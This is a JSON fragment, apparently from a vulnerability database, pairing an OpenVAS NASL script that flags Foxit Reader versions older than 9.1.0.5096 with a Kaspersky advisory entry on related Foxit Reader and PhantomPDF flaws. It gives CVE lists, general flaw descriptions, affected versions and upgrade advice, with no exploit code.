\"CVE-2018-9977\", \"CVE-2018-9978\", \"CVE-2018-9979\",\n \"CVE-2018-9980\", \"CVE-2018-9981\", \"CVE-2018-9982\", \"CVE-2018-9983\",\n \"CVE-2018-9984\", \"CVE-2018-3924\", \"CVE-2018-3939\", \"CVE-2018-17623\");\n script_bugtraq_id(105602);\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-07-05 10:16:38 +0000 (Fri, 05 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2018-04-25 14:35:06 +0530 (Wed, 25 Apr 2018)\");\n script_name(\"Foxit Reader Multiple Vulnerabilities-Apr18 (Windows)\");\n\n script_tag(name:\"summary\", value:\"The host is installed with Foxit Reader\n and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exists due to,\n\n - An error where the application passes an insufficiently qualified path in\n loading an external library when a user launches the application.\n\n - A heap buffer overflow error.\n\n - Multiple use-after-free errors.\n\n - The use of uninitialized new 'Uint32Array' object or member variables in\n 'PrintParams' or 'm_pCurContex' objects.\n\n - An incorrect memory allocation, memory commit, memory access, or array access.\n\n - Type Confusion errors.\n\n - An error in 'GoToE' & 'GoToR' Actions.\n\n - An out-of-bounds read error in the '_JP2_Codestream_Read_SOT' function.\n\n - An error since the application did not handle a COM object properly.\n\n - An error allowing users to embed executable files.\n\n - U3D out-of-bounds read, write and access errors.\n\n - U3D uninitialized pointer error.\n\n - U3D heap buffer overflow or stack-based buffer overflow error.\n\n - An error when the application is not running in safe-reading-mode and can\n be abused via '_JP2_Codestream_Read_SOT' function.\n\n - U3D Type Confusion errors.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to cause a denial of service condition, execute arbitrary code and\n gain access to sensitive data from memory.\");\n\n script_tag(name:\"affected\", value:\"Foxit Reader versions 9.0.1.1049 and prior on windows\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Foxit Reader version 9.1 or later. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"registry\");\n script_xref(name:\"URL\", value:\"https://www.foxitsoftware.com/support/security-bulletins.php#content-2018\");\n script_xref(name:\"URL\", value:\"https://www.securitytracker.com/id/1040733\");\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_category(ACT_GATHER_INFO);\n script_family(\"General\");\n script_dependencies(\"gb_foxit_reader_detect_portable_win.nasl\");\n script_mandatory_keys(\"foxit/reader/ver\");\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!infos = get_app_version_and_location(cpe:CPE, exit_no_version:TRUE)) exit(0);\npdfVer = infos['version'];\npdfPath = infos['location'];\n\n## 9.1 == 9.1.0.5096\nif(version_is_less(version:pdfVer, test_version:\"9.1.0.5096\"))\n{\n report = report_fixed_ver(installed_version:pdfVer, fixed_version:\"9.1\", install_path:pdfPath);\n security_message(data:report);\n exit(0);\n}\nexit(0);", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "kaspersky": [{"lastseen": "2020-09-02T12:00:33", "bulletinFamily": "info", "cvelist": ["CVE-2018-10303", "CVE-2018-3843", "CVE-2017-17557", "CVE-2018-10302", "CVE-2018-3853", "CVE-2018-3842", "CVE-2018-3850", "CVE-2017-14458"], "description": "### *Detect date*:\n04/19/2018\n\n### *Severity*:\nCritical\n\n### *Description*:\nMultiple serious vulnerabilities have been found in Foxit Reader and Foxit PhantomPDF. Malicious users can exploit these vulnerabilities to obtain sensitive information, cause denial of service and execute arbitrary code.\n\n### *Affected products*:\nFoxit Reader earlier than 9.1.0.5096 \nFoxit PhantomPDF earlier than 9.1.0.5096\n\n### *Solution*:\nUpdate to the latest version \n[Download Foxit Reader](<https://www.foxitsoftware.com/downloads/#Foxit-Reader>) \n[Download Foxit PhantomPDF](<https://www.foxitsoftware.com/downloads/#Foxit-PhantomPDF-Business>)\n\n### *Original advisories*:\n[Security bulletins](<https://www.foxitsoftware.com/support/security-bulletins.php>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Foxit Reader](<https://threats.kaspersky.com/en/product/Foxit-Reader/>)\n\n### *CVE-IDS*:\n[CVE-2018-3850](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-3850>)6.8High \n[CVE-2018-3842](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-3842>)6.8High \n[CVE-2018-3843](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-3843>)6.8High \n[CVE-2018-10302](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10302>)6.8High \n[CVE-2018-10303](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10303>)6.8High \n[CVE-2018-3853](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-3853>)7.8Critical \n[CVE-2017-17557](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17557>)6.8High \n[CVE-2017-14458](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14458>)6.8High", "edition": 40, "modified": "2020-05-22T00:00:00", "published": "2018-04-19T00:00:00", "id": "KLA11237", "href": "https://threats.kaspersky.com/en/vulnerability/KLA11237", "title": "\r KLA11237Multiple vulnerabilities in Foxit Reader and Foxit PhantomPDF ", "type": "kaspersky", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}]}
